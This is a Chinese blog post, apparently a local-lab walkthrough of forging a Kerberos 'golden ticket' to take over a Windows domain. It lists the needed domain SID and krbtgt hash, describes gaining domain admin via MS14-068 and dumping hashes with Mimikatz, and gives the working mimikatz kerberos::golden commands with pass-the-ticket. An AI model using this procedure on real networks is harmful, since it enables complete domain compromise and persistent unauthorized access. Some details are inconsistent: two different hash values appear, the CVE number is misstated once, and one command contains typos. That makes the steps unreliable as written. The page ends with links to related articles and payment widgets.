域渗透之黄金票据大法 本地实验

最新推荐文章于 2024-04-03 01:26:45 发布
最新推荐文章于 2024-04-03 01:26:45 发布
阅读量1.3k 收藏 9
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/broing55/article/details/105285508
版权

黄金票据大法

图示:

黄金票据

       ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

黄金票据的条件要求:
1.域名称 hacker.com

2.域的SID 值  S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值

0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

第一步:先进入到域普通用户拿到域名称

域名称    hacker

第二步:拿到  krbtgt  用户sid

S-1-5-21-1854149318-4101476522-1845767379

这个就是krbtgt用户的sid  ,后面的是test的 编号

第三步:域的KRBTGT账户NTLM密码哈希或者aes-256值

cf1a2da5f371896f9d70ebd3e90f2bba

这个一定是在之前就拿到了域管的权限才能操作。使用ms16068漏洞拿到域管权限,在找到krbtgt的哈希值。

工具:mimitatz

第四步:伪造用户名 administrator

数据都拿到了,编写命令

kerberos::golden  /admin:administrator  /domain:hacker.com  /sid:S-1-5-21-1854149318-4101476522-1845767379  /krbtgt:cf1a2da5f371896f9d70ebd3e90f2bba  /ppt

kerberos::golden  /user:administrator  /domain:hacker.com  /id:502  /sid:S-1-5-21-1854149318-4101476522-1845767379 /krbtgt:cf1a2da5f371896f9d70ebd3e90f2bba  /ptt

第五步:清除klist  

klist purge

第六步:工具mimikatz提权

 

broing55
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大学生(票据法)期末考试选择题.pdf
06-17
大学生(票据法)期末考试选择题
权限维持—黄金票据和白金票据
最新发布
lza20001103的博客
04-15 560
权限维持—黄金票据和白金票据
渗透攻击-Pass the Ticket 攻击(票据传递)
weixin_43227251的博客
04-13 872
Pass the Ticket 攻击(票据传递) 1.ms14-068 ​ 限制条件:打了补丁或者中有Win2012/2012R2 控 1.首先在控检测是否有MS14-068这个漏洞,通过查看是否打补丁(KB3011780)来判断是否存在漏洞,下图可以看到没有打MS14-068漏洞相关的补丁 systeminfo 测试访问控的C盘共享,访问被拒绝 3.为了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除 ​ mimikatz kerberos::purge ​
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 2711
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有内的最高权限,攻击者可以访问和控制所有内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
渗透黄金票据
ClarkAlbert的博客
10-29 1515
渗透黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
内网渗透--Golden Ticket(黄金票据)制作&利用
qq_62169455的博客
01-17 1319
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在内机器和非内机器都可以使用。
内网横向——渗透黄金票据复现
ytdd66的博客
04-03 1233
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其中KDC服务默认会安装在一个控中,而Client和Server为内的用户或者是服务,如HTTP服务,SQL服务。在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定。
渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
票据法-复习题及答案.pdf
01-25
票据法-复习题及答案.pdf
渗透工具包
01-15
【标题】:“渗透工具包”是指一组专门用于在Windows操作系统环境下进行权限提升和攻击的工具,主要包括mimikatz、psexec以及ms14-068漏洞利用工具。 【描述】:在网络安全领渗透是攻击者试图获取对...
rubeus+spoolsample.zip渗透非约束性委派攻击实验
08-19
在网络安全领,特别是针对Windows环境的渗透测试中,非约束性委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
[内网渗透]—票据传递
Sentiment的博客
12-08 768
之前我们在哈希传递篇就介绍到,要想使用mimikatz的哈希传递功能,就必须具有本地管理员的权限。但是在实际的渗透环境中,我们更多的是得到一个低权限的账户而已。mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法,如票据传递(Pass The Ticket)。
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 931
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
渗透测试之内网渗透学习
2201_75571291的博客
06-22 1801
渗透测试之内网渗透学习
内网渗透-(黄金票据和白银票据)详解(一)
duoba_an的博客
03-31 1438
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
内网渗透--黄金票据
yc的博客
05-23 1748
渗透-----黄金票据的使用 前言 今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向控制器上的KD
[渗透测试笔记] 49.渗透黄金票据和白银票据
H4ppyD0g的博客
03-17 4576
Kerberos认证协议 《信息系统安全概论》书中对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发中心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是控制器;AD是活动目录。 DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了中所有用户的密码Hash和白名单。只有账户密码
权限维持(黄金票据与白银票据)
qq_18811919的博客
03-19 1930
黄金票据和白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据 与白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 523
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
内网渗透黄金票据和白银票据的区别
03-31
黄金票据和白银票据是内网渗透中常见的两种攻击手段,它们的主要区别在于: 1. 黄金票据通常是使用被攻破的控制器的管理员账户来获取的,因此具有更高的权限,可以访问中的所有资源和计算机。而白银票据则是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值